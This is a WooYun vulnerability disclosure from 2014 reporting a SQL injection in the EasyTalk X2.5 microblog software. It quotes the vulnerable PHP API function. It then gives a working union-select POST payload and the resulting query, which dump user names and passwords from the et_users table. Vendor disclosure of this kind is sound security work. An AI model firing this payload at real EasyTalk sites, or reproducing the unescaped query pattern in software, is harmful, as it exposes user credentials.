当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051534

漏洞标题:EasyTalk SQL注入漏洞

相关厂商:nextsns.com

漏洞作者: My5t3ry

提交时间:2014-02-22 22:50

修复时间:2014-05-23 22:51

公开时间:2014-05-23 22:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-22: 细节已通知厂商并且等待厂商处理中
2014-02-22: 厂商已经确认,细节仅向厂商公开
2014-02-25: 细节向第三方安全合作伙伴开放
2014-04-18: 细节向核心白帽子及相关领域专家公开
2014-04-28: 细节向普通白帽子公开
2014-05-08: 细节向实习白帽子公开
2014-05-23: 细节向公众公开

简要描述:

EasyTalk_X2.5 最新版SQL注入一枚。

详细说明:

漏洞位于/Home/Lib/Action/ApiAction.class.php的

public function userpreview() {
        $username=trim(rawurldecode($this->_post('username')));
        if ($username) {
            parent::init();
            $user = M('Users')->where("user_name='$username'")->find();
            if ($user) {
				if ($user['cityid']) {//用户所在地
					$dtModel=M('District');
					$pdata = $dtModel->where("id='$user[cityid]'")->find();
					$pdata2 = $dtModel->where("id='$pdata[upid]'")->find();
					$user['live_city']=$pdata2['name'].' '.$pdata['name'];
				}
                $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']);
                $f="<span id='followsp2_".$user['user_id']."'>";
                    if($isfriend[$user['user_id']]==1){
                        $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')."&nbsp;|&nbsp;<a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
                    }else if ($isfriend[$user[user_id]]==3){
                        $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')."&nbsp;|&nbsp;<a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
                    }else{
                        $f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>";
                    }
                $f.="</span>";
                if ($user['user_id']==$this->my['user_id']) {
                    $body2='';
                } else {
                    $body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5">&nbsp;&nbsp;&nbsp;<input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' \')" class="button5"></div><div class="fright">'.$f.'</div>';
                }
                if(time()-$user['last_login']<=600){
                    if($user['isadmin']>0){
                        $zxico='<span class="adminico"> '.L('admin_online').'</span>';
                    } else {
                        $zxico='<span class="uonlineico"> '.L('user_online').'</span>';
                    }
                } else {
                    $zxico='<span class="uofflineico"> '.L('user_offline').'</span>';
                }
                echo '<div class="body1">
                    <div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div>
                    <div class="linfo">
                        <p>
                        <div class="fleft">
                            <span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span>
                        </div>
                        <div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div>
                        <div class="clearline"></div>
                        </p>
                        <p>'.($user['user_gender']==1?L('male'):L('female')).'&nbsp;&nbsp;'.$user['live_city'].'</p>
                        <p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a>&nbsp;&nbsp;'.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a>&nbsp;&nbsp;'.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p>
                    </div>
					<div class="clearline"></div>
                    <div class="linfo2">';
				if ($user['user_auth']) {
					echo getsubstr($user['auth_info'],0,35);
				} else {
					echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35);
				}
				echo '</div>
                </div>
                <div class="body2">'.$body2.'</div>';
            } else {
                echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
            }
        } else {
            echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
        }
    }


其中这句代码
$username=trim(rawurldecode($this->_post('username')));
使用了rawurldecode导致二次注入

漏洞证明:

sql3.jpg


url为:
http://192.168.116.129/easytalk/?m=api&a=userpreview
POST数据为:
username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23
最终带入数据库查询语句为:

SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1

修复方案:

转义

版权声明:转载请注明来源 My5t3ry@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-02-22 23:19

厂商回复:

正在修复

最新状态:

暂无